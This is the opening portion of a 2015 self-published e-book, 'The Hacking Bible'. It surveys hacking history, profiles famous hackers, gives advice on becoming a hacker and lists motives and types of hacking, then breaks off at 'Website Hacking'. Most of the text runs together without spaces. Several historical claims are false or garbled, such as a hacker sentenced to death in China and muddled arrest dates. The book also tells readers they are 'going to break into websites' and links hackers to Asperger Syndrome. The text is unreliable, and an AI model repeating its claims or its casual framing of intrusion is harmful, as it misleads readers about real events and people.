THEHACKINGBIBLE:TheDarksecretsofthehackingworld:HowyoucanbecomeaHacking

Monster,Undetectedandinthebestway

ByKevinJames

©Copyright2015byWECANTBEBEATLLC

TableofContentsCHAPTER1:INTRODUCTION

WhatHackingisallAbout

TheHistoryofhacking

BestHackersofAllTime

CHAPTER2:HOWTOBECOMEAHACKER

AHackersStyle

GeneralHackingSkills

WhyDoPeopleHack?

CHAPTER3:TYPESOFHACKING

WebsiteHacking

EthicalHacking

NetworkHacking

EmailHacking

PasswordHacking

ComputerHacking

OnlineBankingHacking

CHAPTER4:HACKINGANDNON-HACKING

HackersandtheLaw

HowdoHackersAffectOurLives

HowtoKnowifYou’reHacked

HowtoprotectYourselfFromHacking

CHAPTER5:ADVANTAGESANDDISADVANTAGESOFBEINGAHACKER

CHAPTER6:HACKINGTOCHANGETHEWORLDPOSITIVELY

AnAnonymHackerWhoCouldSavetheWorld(basedonrealcase)

CHAPTER7:HACKINGTIPSANDTRICKS

CONCLUSION

HackEthically

CHAPTER1:INTRODUCTION

WhatHackingisallAbout

WWW,andthat’showanewworldbegins…

It’sWorldWideWeb, aworld that is created by humans andwhere in the 21st

century, the century of technologymost of the people are more present in theWorld Wide Web living their lives there and quitting the real life due to theadvantagesthatWorldWideWebisofferingthemalmostforfree.

Technologyisascienceofanensembleofmethods,processesandoperationsthatareusedinordertoobtainaproductoraresultandasFrancisBaconsays,knowledgeisalreadypowerandtechnologyisknowledgesotechnologyisthebiggestpowerofourcentury,apowergivesusagreatopportunitytodoourdailytaskswithoutputtingabigquantityofeffortandwithoutrunningfromplacetoplacejusttofinishourtasks,technologygivesusabigpaletteofservicessuchasaccessinganyinformationanytime,anywhere,gettingintonewvirtualworldsbasedondifferentdomains,communicatewithpeoplefromothercountriesorcontinentsjustwithaclick,payingbillsfromhomeandmuchmorethanthat

Technology is great, of course, and we all love it because it’s making our liveseasierandmoreenjoyablebutasanyotherthingitaslongasithasadvantagesithasalsodisadvantagesbecauseonceyouputyourinformationontheinternetyouareexposingyourperson,yourpast,presentandmaybealittlepartofyourfutureaccompanied by your whole package of information that could be accessed byothers who break the security rules and in that way you can lose basicallyeverything,butasarulethatlifeinputsifyoudon’triskyoudon’twin.

Nowadays, a lot of people steal. Some of the people steal feelings, break otherspeopleheartsandlives,someofthepeoplestealphysicalstuffsuchascars,bags,walletsandhousesbutarethosepeopletheonlytypesofoffendersintheworld?!Theanswerisno,theyaren’t.Thereisanothertypethatisgrowingdaybydayandthistypeisrepresentedbyhackers.Hackersarepersonswhoarepassionateandattractedbyknowingeverythingindetailaboutthecyberneticsystems,especiallycomputer systems. Despite the conception that hackers are persons with evilintentions that want to run theworld someday by their own conceptions, theirpassion for details and understanding them most of the hackers have aprofessionalgoalandtheydon’tusetheirknowledgetoseekandexploitweaknessinacomputersystem.

Hacking is the operation where you need a computer to use in order to getunauthorizedaccessintoasystemwhichcontainsinformatics.

This kind of definition is losing the most important aspects of a culture thatpowerfullyhelpedustomakethe21stcentury,thehightechnologycentury.Inhisversion1.0.0,ahackerwasapersonfullofpassionreadytogiveanewsensetoeverything around him.His birth was at TechModel Railroad Club in the 50’s

when the computerswerewaymoredifferent thanwhatwehave todayand thebestofthemarestillmeetingat‘’hackerspaces’’wheretheyorganizemarathonsofhacking where they are collaborating and interacting with each other to find amodernsolutionforaproblem.

Inthe90’s,ahackerwasagoodintentionedpersonwhoownslargeskillsinthedomain but as time flies, people started to use ‘’hacker’’ describing an offendernowadaysbecauseapartof thehackersafter resolvingproblems they started touse their knowledge in an opposite way, creating real monsters who accesspeople’sprotectedcomputersandfilesandthistypeofhackersarecalled“BlackHat” hackers also known as crackers and the 90’s basic hacker version 1.0.0 iscallednowadays“WhiteHat”hackers.

So,whenyouaresabotagingaperson’scomputeryouarebasicallyhackingthem.

Early in 1971, JohnDraperwhowas a computerpassionatediscovered aboxofcereals for children in whichwas included a toy whistle that it’s reproducing a2600-hertz audio tone which was necessary to begin a telephone line and thatmarkedthemomenthestarteddoingphonecalls,heendedupbeingarrestedforphonetampering.

Six years later Steve Jobs and SteveWozniak bothmembers of theHomebrewComputerclubofCaliforniawereat thebeginningofcreatingoneof thebiggesttechnologycompanies in theworldbutbefore that,amysteriousdevicehas justappearedonthemarket,itwasknownas‘’thebluebox’’anditwascreatedhavingas a base the discovery from 71’s about generating tones that were helping thepeoplehackintothephonesystems.Howgreat!Justimaginegoingbackintimeand taking part at how a big company is taking birth and growing sale by sale.Whoeverthoughtthatthoseboxeswillbesuchaworldwidesuccess?!Ithinknoone.

TheHistoryofhacking

Lookingbacktothe86’swhenhackingwasofficiallyacrimeduetoanorganizedcongress where Computer Fraud and Abuse Act and the ElectronicCommunications Privacy Act agreed that it’s a crime to ‘’ violate’’ computersystems.TwoyearsearlierEricCorleystartedabusinesswithamagazinecalled

“2600: The Hacker Quarterly” where he was publishing about telephone andcomputerhackingandthismagazineitbeganinshorttimeaguidetothehackers.

Onlyoneyearlater,thepeople’ssystemsofcommunicationsandtheirtelephonenetworkswereveryclosetoapossibleendoftechnologybackthen,abigdamagethat had to affect thewhole nationwas nearlymade byHerbert ZinnwhowaslivinginChicagoalsoknownbythenicknameof‘’ShadowHawk”hackedfromhisbedroom theAT&T’s computernetworkandbroke in the system,after thathe’sgotarrestedatonly17yearsold.

InthesameyeartheydiscoveredthefirstviruswhichwascalledBrainknownasMS-DOSaffectingthecomputer’ssystemanditwasreleasedontheinternetandtheunluckyownersofthevirushada‘’specialfile’’createdontheirharddrivethatwasgivingtheircontactinformationfor“BrainComputerServices”whichwaslocatedinPakistan.

A big shot came in 1988when a student released the first self-replicating virusthatcanaffectover6000systemsandthebigproblemwaswiththisvirusbecauseit was shutting down the network system for about two days. It was speciallydesignedtohacksecurityholes in theUNIXsystems, thisviruswas inventedbyRobert Morris who graduated from Cornell University before he released thevirus.

After the big shot with only two years, The Electronic Frontier Foundation istakingbirthandit’smajorgoalwasprotectingandtakingcareoftherightsofthepeoplewhichwereaccusedof computerhacking.Also, “LegionofDoom”whichwerefourmembersformingabandinSoutheasternUnitedStatesaregettingintothenetworkandcomputersystemsof

BellSouth’s911emergencystealingtechnicalinformationthatcouldaffectthe911serviceintheUnitedStatesandtheyendedupbygettingarrested.

The Secret Service cooperated with Arizona’s organized crime unit developedOperation Sundevil, a big national project having as goal hunting down thecomputerhackers.Whatayear!

Gulf War was also affected by hacking culture; a group formed by DutchTeenagersbrokeintothecomputernetworkin1991andgotunauthorizedaccessgetting important information about the war and its plan of operations andpersonalinformationaboutthemilitarieswhowereparticipatingandsomeexactnumbers about the military equipment that was sent to Persian Gulf. Hackersrepresentedamajorprobleminthatpieceoftimebecausebyhackingtheywere

abletomakehistorybychangingmilitaryoperationsplansandbymakingpublicsomeofthetop-secretdocuments.

AstheGulfWar,NASAandtheKoreanAtomicResearchInstitutegothackedbytwo teenagers known as “Data Stream” and “Kuji” broke into a big number ofcomputersystemsdirectedbythetwoinstitutionsandafterlongtimeresearchessome detectives from Scotland Yard got the two hackers that were so affectedemotionallyandendedupcryingwhencaptured, they turnedthewholemissionintoabigdramamixingfeelingsandemotionswithskillsandknowledge.

EventheBritishQueengothacked!andmanyimportantpersonsformtheBritishgovernment such as Prime Minister John Major and important militarycommandantsundersecretmissionsgothackedbyaemployeeatBritishTelecomwhohackedacomputernetworkwhichcontainedall theabovepeoplenumbers,thenumberswerepostedon the internet after thediscoveryand thehackergotcaughtbySecretServicesincooperationwithPolice.TheCitibankgotamassivedamagecausedbyhackersin1995whenVladimirLevingotillegallyusinghisownlaptop inCitibank’s computernetworkwherehe started to transfer big sumsofmoney to different accounts around the world that were supposed to be hisaccountsandtheexactnumberofmoneystolenandtransferredisstillamysterytoday but it’s estimated between $3.7-$10 million, after this big shot he’s gotarrested inBritainwith a punishment of 3 years in prison and an order to payCitibank$240,000.

AccordingtoareportreleasedbyTheGeneralAccountingOffice,250,000timesonly in 1995 hackers tried to get illegally into Defense Department files whichincludedpreciousdataanddocuments,65%oftheattendantsalreadysucceed.

Hackerswere at every step,CIA’s agentsnoticed amajor change applied to thewebsitemadebyagroupofhackersknownasSwedishHackersAssociationwhochangedtheorganization’snameinto“CentralStupidityAgency.”

1997representedanimportantyearinHackingHistory,thefirsthackingprogramwasreleasedwiththenameof“AOHell”,forfewdaysAOLnetworkwasputonpauseandhundredsofthousandsofuserswerefoundingintheire-mailsmultiple-megabytemessagesalso,chatroomsgotinvadedbyabunchof‘’spam’’messages.

The Symantec AntiVirus Research Center which was the head of security andantivirus software gave the nation a report telling us that they are more than30,000computervirusesfree,travelingandcirculatingwithoutanyrestrictionintheVirtualWorld.Asanyotherdomain,aviationisalsobasedontechnologyandthe use of computers are at every step even in the air where there are threecomputersoneachplane’sboardandeachofthemiscommunicatingwithothercomputers that belong to the air traffic controllers,without technology aviationwouldbe80%dead.

Forthefirsttimeinaviationbrighthistory,in1998aviation’sgotthefirstmassive

attack fromhackers,BellAtlantic airport communications system inWorcester,Massachusetts got hit down by a hacker which caused a big damage byinterruptingthecommunicationsbetweenairplanesandtheairportformorethansixhoursbuthappilytherewerenoaccidents.Informationsharedwiththepublicaretellingushe’saboybuttheyaren’tgivinganyotherpersonalinformationsuchasnameandage.

Hacking canbedangerous for theBlackHathackers and it canbring them thedeath, in the same situation were in 1998 three teenagers, two of them formCloverdale,Californiaandthethirdofthemwhichwastheheadofthegroup,anIsraeli teenager known as “TheAnalyzer” got a sentence to death by a court inChinaafterbreakingintocomputernetworksystemsbelongingtofederalagenciesandbanks.

E-bay was highly affected in 1999, exactly inMarch by hacking when a hackerknown as MagicFX breaks into the site destroying the site’s front page, thecompanywassoaffectedbecauseMagicFXwasabletochangeifhewantedtotheprices, add inexistent items for sale and redirect the whole online traffic toanothersite.TheSymantecAntiVirusResearchCentergivesusanotherreportin2000estimatingthatineachhourofthedayonenewvirusisbornandleftfreetocirculateintheVirtualWorld.

Loveisagreatfeeling,it’safreegiftfromlifetousthatwecouldopeneveryday,ineveryhourandeverysecondbutdoesloveonlycomeinthisform?No!it’snotbecausethereisalsoan“ILoveYou”viruswhichshowedupintheMayof2000inPhilippines then contaminating thewholeworld in amatter ofhours.Beforeany solution was found it’s estimated damage about $10 billion lost filesworldwide,howtrickylovecouldbeifyoudon’tprotectyourself.

Later in 2001 inMay, the severalU.S. government sites,Department ofHealthandHumanServicesandtheCentralIntelligenceAgencywerehackedbycouplegroups of Chinese hackers causing information lack andmodifying data. In thesame month, Microsoft websites got interrupted by attacks from DDOS-distributeddenial-of-service.

BestHackersofAllTime

Despitetherichanddiverseculture,asanyotherdomain,hackingownsatopofhackers who made the biggest hacks in the world, and it’s hard to be on topbecausetherearemillionsofhackersbutonlythebestskilledofthemsucceed,therestarejustapartofpeopleusedtomakethesuccessfulhackersshineevenmore.In fact,beingsuccessful isnotevenagoal; successfulpeoplearepeoplewhodoeverythingwithpassionandhardworknomatterhowhard thesituation isandsuccessisacollateraleffectyouget,notagoal.

Gary McKinnon was born on 10 February 1966 in Glasgow, Scotland, he hasalways been curious and passionate about computers and informatics, which istotallygreatifyoufollowyourdreaminthisdomainofscience.Grayislivingrightnow in London and he is known as a hacker for the operation he did in 2002called“biggestmilitarycomputerhackofalltime”whenheusedtoputdowntheUSMilitary’sWashingtonNetworkofabout2000computersfor24hoursandthat’showhereceivedthetitleof“Thebiggesthackerofalltime”,hiscuriositystronglymadehimtobreakintoNASA’scomputersjusttogetinformationonUFOs,hewantedtomakesurethatheisgettingitrightfromthesource.Heillegallyaccessed97USMilitaryandNASAcomputersbydeletingacoupleoffilesandinstallingavirus.Everythinghemadewasjusttosatisfyhiscuriosity.Thewholehackwasfrom his girlfriend’s aunt’s house in London using the name“Solo”.More than that, after hacking he posted amessage on theUSMilitary’swebsitesaying“Yoursecurity is crap.”Andcontinuedhackingbutat theendheadmitted that he left a threat on one computer after another hack saying “USforeignpolicyisakintoGovernment-sponsoredterrorismthesedays…ItwasnotamistakethattherewasahugesecuritystanddownonSeptember11lastyear…IamSOLO.Iwillcontinuetodisruptatthehighestlevels…“.

Rightnow,Grayishappywithhistitleandbyfollowinghisdreamheismorethanpleasedworkingasasystemadministrator,agreatexampleofamanwhoishappybecausehefollowedhisdreams.

LulzSecorLulzSecurityisanimportantgroupofhackersduetotheirrealizations,theyareagroupwithelevenmembersandsevenvolunteersandtheyaredoinghighprofileattacks.

Their motto is “The world’s leaders in high-quality entertainment at yourexpense”, “Laughingatyoursecuritysince2011”andtheirmaingoal isshowingthegigantic companies their lackof security andabsenceof taking careof theirpersonal data. They hacked Sony,News International, CIA, FBI, ScotlandYard,and several noteworthy accounts to show them how they can play with otherpeople’s information. By hacking, they were having lots of fun and ademonstrativeattackiswhentheybrokeintoNewsCorporationsaccountpostinga report about the death ofRupertMurdoch on 18 July 2011whichwas totallyfake.

Also,theyhavecreatedanASCIIgraphicusedbytheminitsChingaLaMigratorrent,here’showthegraphiclookslike:

./$$/$$/$$$$$$

.|$$|$$/$$__$$

.|$$/$$/$$|$$/$$$$$$$$|$$\__//$$$$$$/$$$$$$$

.|$$|$$|$$|$$|____/$$/|$$$$$$/$$__$$/$$_____/

.|$$|$$|$$|$$/$$$$/\____$$|$$$$$$$$|$$

.|$$|$$|$$|$$/$$__//$$\$$|$$_____/|$$

.|$$$$$$$$|$$$$$$/|$$/$$$$$$$$|$$$$$$/|$$$$$$$|$$$$$$.$

.|________/\______/|__/|________/\______/\_______/\_______/

//Laughingatyoursecuritysince2011!

AnotherimportantfigureinhackingworldisrepresentedbyAdrianLamo;hewasborn on February 20, 1981 in Boston, Massachusetts and he is mixed race(Colombian-American)he isknownasa formerhackerand threatanalyst.Lamodoesn’t own a high school diploma and hewas often called “HomelessHacker”because he loved to surf, travel, explore abandoned buildings and go to theinternetcafes,librariesanduniversitiestodiscovernetworkandlookafterdetails,exploitingsecurityholeswasalwaysahobbyforhim.

Lamofirstgotmediaattentionwhenhedecidedtochangecareersandrealizedhisskillsinhacking.HehackedbigcompaniessuchasYahoo!,Microsoft,Google,andTheNewYorkTimesandintwothousandandthreehe’sgothisfirstarrest.Intheprison,he studiedandaftergetting freehe’s got abatchof anAmericanThreatAnalystwhichallowshimtobreakintoaccountssittingisspaciousplacessuchascafeterias. Lamo is one of the biggest examples showing us that school is notlearning you everything and the main problem of school nowadays is the bigamount of information school is giving to the students in different domains inordertoletstudentschooseadomaintheyloveandspecializeonlyonit.

NumberfourinthistopistakenbyMathewBevanandRichardPryce,twohackerswhichcaseissimilartoGray’scase.MathewBevanwasborninJune10,1974andheisaBritishHackerborninCardiff,Waleshe’sgothisfirstsentenceandarrestin 1996 after breaking into secure U.S government network protecting himselfwith the nick name “Kuji”,Mathewwasn’t very good at school andhe used theinternettoescapeformthereallife,inthiswayheformedadoublelife,thefirstonewithordinaryactivitiesatdayandthesecondlifewithnightactivitiesbasedon computers and networking.MathewBevan andRichard Pryce createdmanydamagesbetweenUnitedStatesofAmericaandNorthKoreaastheyusedtohacktheMilitaryUs computers and installing on them foreign and strange systems.

The contents of Korean Atomic Research Institute were dumped into USAFsystem.

Jonathan Joseph James (December 12, 1983 –May 18, 2008) is an Americanhacker fromNorthFlorida andhe is the first juvenile inprisondue to a cyber-crimehedidatageof15.Hisactionnameis“c0mrade”andhebrokeintoDefenseThreat Reduction Agency of US department and he installed software thatcontrolled themessagespassedon thoughconversationsbetweentheemployeesofDTRAandhealsocollectedtheusernamesandpasswordsandotherdetailsofemployees. More than that, he stole important software. NASA paid from itswallet 41,000$ to shut down its system. Jonathan ended his life committingsuicidein2008.

NumbersixisKevinPoulsenandhishackstoryisthefunniestsofar.KevinLeePoulsen(bornNovember30,1965)wasborninPasadena,Californiaandheisablackhathackerbecauseheusedhis skills togetoneofhis interests true,he iscurrentlyworkingasadigitalsecurityjournalist.Wouldyoudoanythingtofollowyourdreams?Inhiscasetheanswerisyes,sofromdreamtopracticewasonlyastepandhemadethisstepbyhackingaradioshowpoweredbyLosAngelesradiostationKIIS-FM,thegamerulesweresosimple,the102ndcallerwillwinaprizeofaPorsche944S2andKevinwantedtomakesurethathewillbetheluckycallersohe hacked into their phone line. Known as “DarkDante” hewent undergroundwhenFBIstartedtofollowhimbuthewascaughtandarrestedwithasentenceoffiveyears.Andnooneknowswhathappenedwiththecar.

KevinDavidMitnickwasbornon6August, 1963 inLosAngeles,California, hewas called once as ‘’themost wanted cyber-criminal of US, but time and worktransformed him into a successful entrepreneur. Kevin is also an importanthacker; he broke intoNokia,Motorola and Pentagon.He’s gotmedia attentionwhenhewasarrestedin1999and1988,hehadtwohacknames“TheCondor,TheDarksideHacker”andafterspendingfiveyearsattheprisonheopenedasecuritycompanynamedMitnickSecurityConsulting.

At the age of 15 he showed his interest to social engineering and he started tocollect information including user name, passwords and phone numbers.Nowadays,heisworkingasacomputersecurityconsultantbutinthepastheusedtoworkasareceptionistforStephenS.WiseTemple.

Numbereight is takenbyAnonymous,oneof themostpopularmoves fromthelastyears,thegroupwasbornin2004onthewebsite4chan,it’smoreanideologyanditrepresentsaconceptinwhichfewcommunitiesofusersexistinananarchicsociety and they are fighting for internet freedomagainst big corporations. Themembers are wearing Guy Fawkes masks and they are attacking religious andcorporatewebsitesinspecial.TheyhavetargetssuchasTheVatican,theFBI,andtheCIA,PayPal,Sony,Mastercard,Visa,Chinese,Israeli,Tunisian,andUgandangovernmentswhichtheyalmosttouch.ManyofthememberswishtocontroltheVirtualWorldsomeday.

Astra is the cover of a Greek mathematician who is 58 years old and it’s wellknowndue to the damageAstra caused to theFrenchDassaultGroup in 2008.Astra hacked into their system and stole weapons technology data and for fiveyearsAstrasoldthedatatofivecountriesaroundtheworld.Officialsourcessaythathehadbeenwantedsince2002.Astra’shappinessmeantDassaultsadnessbecausethedamagecausedtoDassaultwasabout$360millionswhileAstrawassellingdatatomorethan250peopleallaroundtheworld.

AndthelastplaceinthistopistakenbyAlbertGonzalez,anAmericancomputerhacker;I’dcallhimTheMasterHackerofinternetbankingbecausehestolemorethan170millioncreditcardsandATMnumbersintheperiod2005-2007.HeisoriginallyborninCubain1981butheimmigratedtotheUSAin70’sandhe’sgothisfirstcomputeratageof8.

Aftermany attacks he’s got arrested onMay 7, 2008 and got a sentence of 20yearsinFederalprison.

CHAPTER2:HOWTOBECOMEAHACKER

AHackersStyle

Hackersarepeoplewhoenjoytheiractivitybothmentallyandpractically,theyareproblem solvers and new software builders, they are confident and believe involunteerwork and freed0m,oneof their basic rules thatwe should also adoptpracticallyandnot just theoretically ishelpingeachotherwhen it’sneeded,yes,hackers help their mates whenever is needed. To be accepted in the world ofhackers it depends only on you, depends in the biggest part on your attitude.Hackers try tounderstand everypiece of a problemand then findor create thebest solution, the motivation of being a hacker should come from your insidewithoutanyinfluencebecausetheonewhoisgoingtobeinthesituationisyou,andnooneelse.Beinganoriginalgoodhackerisamind-set.

But in thecommunityofhackers therearea fewrules to respect,andhere theyare:

Thefirstruleisaboutyourconnectionwiththeworld,intherealworldproblemscan’tbestoppedandyouhavetothinkaboutthesolutionforeveryproblemandstrongly believing there is a solution for every problem, and if there is not youshould create one.Hacking world is absolutely fascinating once you discover itandyouunderstanditandforahackerthisworldshouldbetheonlyone,hackershavetonsoffunbydoingtheiractivitybutnoonetellsaboutthatkindoffun,isthekindoffunwhereyouhavetoworkandputalotofeffortbyexercisingyourown intelligence in order to succeed. As a hacker you should rather resolve aproblemthancomplainingabouthavingaproblem,hackingisinfactalifestyle.

Thesecondruleisamatterofperfectionism;youshouldbelievethatonceyousolveaproblemthereisnoneedtodoitagainbecauseyoualreadydiditinanidealway.Jumpingintosolutionisn’tasolution;youhavetothinkatleasttwicebeforeyougetinaction.Tobehavelikearealhackeryoushouldnotwastetimeonfindingtwosolutionsforthesameproblem,remember?Therearealotofproblemsthatneedstobesolved.Thethirdruleistellingusabouttheevilworkandboredom,theycouldseriouslyaffectyouractivityasahackersotheyarecategorizedasbeingevil.Oneofthebestwaystolosethecontactwithevolutionandinnovationistobecomerepetitive.Ahackerisalwayscreativeandreadytobuildnewstuffand if you are assaulted by boredom it means that you are notdoing your job as you were supposed to, while breaking the first two rules.Freedom is the best, that’s the fourth rule; everyone loves freedommore thananything but they realize only when they loose it. Hackers don’t have a boss,hackersaretheirownleadersanditdependsonlyontheirpersoniftheywanttoprogressornot,butifwe’retalkingaboutarealhackerthenhewillalwaysbeinabubble that’s growing. Leave borders somewhere far, you have to be very openmindedinordertobearealhackerwhichmeansyoushouldacceptnewconceptsandideasandworktorealizethem,youshouldmakeyourownrules,asetofrules

whichisgoingtoimproveyourcreativity,asetofrulesthatshouldallowyoutodowhateveryouwantandwheneveryouwant.Listeningtoordersmustbeexcludedfromthestart;themainideaisaboutresolvingproblemswithyourownconcepts.Whatareyougoing toachieve if youare listening toothers ideas?Nothing. It’sworseifyoupracticetheirideas,sobefreeasabirdinthesky.Attitudecan’thidethe lackofcompetence; this is the lastruleyoushouldrespect.Tobehave likeahacker you should have a compatible attitude but don’t forget about thecompetenceandtheskills!Anexcessofattitudeisnotgoingtoturnyouintoarealhacker, isgoingtoturnyouintoacelebrityorachampionathlete.Hardworkistheultimatekeyofsuccessthatwillhelpyouopendoorsintheworldofhackers,forbeingahackerisneededtohaveintelligence,practiceanditrequestsalotofconcentration,alsoyoumustbe100%dedicated.

Thoserulesaregoinghandbyhand,and ifyoubrokeoneruleyouaregoing tobreakthemall.Respectisthepriority,itallstartsandendswithyou,ifyoureallyrespectyourselfthenyoushouldrespectyourchoicesaswell.

Ithinkthoserulesareasolidbaseforanysuccessfulpersonandrespectingthemwouldguideintoabrightsocietywithresponsiblepeople.Unfortunately,wehaveto create communities and smaller versions of societies because there is a verylimitednumberofpersonswhorespectrules.Idealismdoesn’tcomeinbigsizes.Differences between people are meant to be, strong people help wear peoplerealizehowincompetenttheyare,poorpeoplemakerichpeoplefeelevenricher,unhealthy peoplemake healthy people their luck and vice versa in each of theabove,that’showtheworldworks…..

GeneralHackingSkills

Whenyoubuildahouse, you shouldhavea strongbase; it’s the same ifwearetalking abouthacking.Youneedabase inhacking too so there are fewhackingskillsthatarebasicskillsandIamgoingtopresentthemtoyou:

Firstofall,youshouldknowhowtoprogramand ifyoudon’tknowyoushouldlearnasfastaspossiblebecausethat’sinahacker’sbasicpackage.Programmingisthemainskill,ifyouareabeginnerandyoudon’tknowwhatacomputerlanguageisaboutthenstatusingPython,it’sverygoodforbeginnersbecauseeverythinginPythonissoclearandit’sverywelldocumented,I’dpersonallysayitwasdesigned50%forbeginnersduetothesimplicityyoucanworkwith.

YoucanfindhelpfultutorialsatPythonwebsitehttps://www.python.org/.

After learning some basic programming, you will progress and I recommendlearning how to work with C, the core language of UNIX, furthermore, if youknowtoworkwithCitwouldnotbecomplicatedtoworkwithC++becausetheyareveryclosetoeachother.

ThereareotherprogramminglanguagesthatareimportanttohackerssuchasPerlorLISP.Perlisthebestoptionifyoulovepracticeworkdespitethis,Perlisusedalotforsystemadministration.LISPishardertounderstandbutonceyougetityouwillbeveryproudofyourselfandexperiencedbecauseitwilldefinitelyhelpyoutobeabetterprogrammer.

Actually, only knowing the programming languages is not enough because youshould exercise with your self to think about programming and solving theproblemsinabigwaywithoutalotoftimeneeded.

Programmingisnotaneasyskillsoyouhavetowriteandreadcodesandrepeatthemuntilyougetacertainmeaning.

LearneverythingaboutHTML

HTMListheWeb’smarkuplanguageanditmeansHypertextMarkupLanguage,it’sveryimportantbecauseyoulearnpracticallyhowtobuildawebpagefrom0andit’shelpingalotifyouareatthestartofprogrammingbecauseit’scodeswillrunyourmind.

WritinginHTMLdefinitelyopensyourhorizonsandmakesyouthinkevenbiggerthanbefore.WhatIloveaboutHTMListhatyouareabletocreateanything,youcanwrite,youcancreateimagesandformsasyoulikeonlybyknowingthecodes.

Englishlanguageisamust

Thisisaninternationalkeyofcommunication,everythinghasanEnglishversiontooevenifit’snotthemotherlanguageinthecountry.

If you are not sure about your English skills, you should make them at leastperfectasfastasyoucanbecauseEnglishismainlanguageinhackercultureand

on the internet. Studies show thatEnglishhas the biggest and richest technicalvocabularythananyotherlanguageoftheglobe.GrammaristhekeytoopentheEnglishworld.Goforit!

Learningcomputernetworking

Becauseyouaredefinitelygoingtobreakintowebsitesandnetworkresources,it’saveryimportantandusefulskillbecausetherearealotofwaystohackawebsitebutit’salldependingontheserverandonthetechnologythatthesiteusessuchasASP.net,PHP,etc.

Therearesitesspeciallydesignedforhackerswhichwilltakeyouonalongroadfrom SQL injection to XXS attacks, just to make sure you have learnedeverything.

LearnUNIXandLinux

UNIXrepresentstheoperatingsystemontheinternetandifyoudon’twanttobeahackerthis isnotamust,but ifyouaregoingtobeahackeryoushould learnandunderstand it.Linux isanothercomputeroperatingsystemandyoucangetveryclosetoitbydownloadingandusingitonyourownmachine.

Togetagreat experience inprogrammingandalsogoodskills run the systems,understand them, read thecodes,modify thecodesanddo it alloveragainanddon’tforgettohavefunwhilelearning.

So,thosearesomegeneralhackingskillsandifyouaregoingtotakecareofthemandputtheminpracticeyoushouldbecomeahacker.

WhyDoPeopleHack?

Oneofthefrequentquestionwhenitcomesabouthackingiswhydopeopledoitand there is a big palette of reasons about this subject. Many people ask thisquestionwithoutevenknowingwhatahackisabout.

Some hackers hack just for having fun, they break into websites, servers andnetworksystemsfortheirentertainment,otherhackersdoitbecausetheyliketobeinthecenterofsomeone’suniverseandtheygettherebyhackingintodifferentstuff and they cando it also toprove someone something at amoment of theirexperiences as hackers. They also enjoy doing it because it’s like amind puzzlewhereyouarefreetoputanypieceasyouwantbutyouknowithastoworkandthat’s why hackers find it extremely satisfying to hack. Hackers are alsoentertainedbyspyingonfriendandfamilyandwhynotonbusinessrivals.

Therearehackerswhohackasystemjusttogetvaluableinformation,othersareinterestedinstealingfilesorservicesinordertosellthemlaterandgetmoneyonitandabigpartofhackingadeptsareinthiscategory.

Manyofthehackersarepoweredbytheirownsystem,theycouldbepoweredbycuriosity,andtheyareverycuriousaboutnewsystemsandveryinterestedinupdatesandITstuff.Manyofthecurioushackersworkforcompaniesespeciallytoprobetheircomputersystemsbyhackingthemandthentheyinformthesystemadministratorabouttheweaknesstohelphimimprovehissecurity.

Moneyisanotherreasonforhacking;someofthepeoplebecomehackersjusttobeabletomakemoneyformhackingtechniquessuchasgainingentrytoserversthatcontaincreditcardsdetails.

Yourcomputermaybehackedifyounoticethatabigamountofmemoryistaken,hackersalsohacktouseothercomputers inactivitiessuchasdepositingpiratedsoftware,piratedmusic,pornography,hacking tools etc.They canalsouse yourcomputerasaninternetrelayorasapartofaDDoSattack.

An important reason is disrupting, some of the hackers break into targetcompaniestodisruptthebigbusinessjusttocreatechaosandtoshowthemtheirabsence of taking care about security, most hacks of this type are powered byhacker groups suchasLulzSec.Scientists say thathackersmighthaveadiseaseknownasAspergerSyndrome(AS)andthevictimsarepeoplewhoaren’tgoodatsocial relationships but own a special capacity to focus on numbers and hardproblemsforalongtime.

Mostof the timeshackersarecategorizedaschallenge loversandhackinghasastrong connectionwith challengingbecause basicallywhen you arehacking youarechallengingyourselftotrynewthings,tosolvethemostcomplicatedproblemsandifyouwillsucceedonceyouwon’tstop,becausethatiswhatishackingabout,soyouarealwaysputtingyourselfinfrontofintellectualchallenges.

Thosearethemostcommonreasonsthataredeterminingpeopletohackandtheir

interior power is helping them to transform into real hack masters. There arepeoplewhohack for theirpersonal interests just likeKevinPoulsenwhogothisdreamcarbyhackingandofcourse,therearestillunknownreasons.

CHAPTER3:TYPESOFHACKING

In every country on the globe youwill find an own culture, lifestyle, food style,traditionsandpeopleandtherewillneverbetwocountrieswiththesamecultureor traditions because those are themain features thatmakes a country unique.Youwillmeetinyourlifedifferenttypesofpeople,youwillmeetpacifistpeople,qualitypeople,lowqualitypeopleandthelistcancontinue,it’sthesameifwetakeasecondandthinkalittlebitabouthacking,therearedifferenttypesofhackingand each type specializes and focuses on something, there are different goalshackerstoreachineverytypeofhacking.

Intheendyoucancategorizepeoplebytypes,hackersdoexactlythesameintheirworld,andtheycategorizetypesofhacking.I’dsaythattypescreatedbyreasonsandonceweknowthereasonwecancategorizeahack.

There are seven big types of hacking, the first one is website hacking and it’susually used to hack into big brands/ companies websites. The second type ofhackingispasswordhackingandhackersdoitinthiscasetocollectinformationorgetaccesstoanimportantdocumentandothersdoitjustforfunpoweredbycuriosity,nexttypeofhackingiscalledcomputerhackingandithappenswhenahackeriscontrollingyourmachinewithoutyourpermission.

Network hack attacks are growing since 2003, usually hackers break into anetwork to disrupt and cause chaos, the fourth type is email hacking and it’spoweredbypeople curiosity about you, about your activities andhackersmightsentemailswithyournamepretending theyareyou,another typeofhacking isthe ethical hacking and it’s used when a big company wants to discover theirsecurity threatsonanetwork, systemorevenonacomputer.And the last type,andthemostseriousofallisinternetbankinghack,peoplewhousuallyperformthis typeofhackingaren’trealhackerspoweredbyskills,knowledge,challengesand curiosity, they are powered by lack of money and that’s why they become“hackers”, just to get their bank accounts full taking benefit from others bankaccounts.

WebsiteHacking

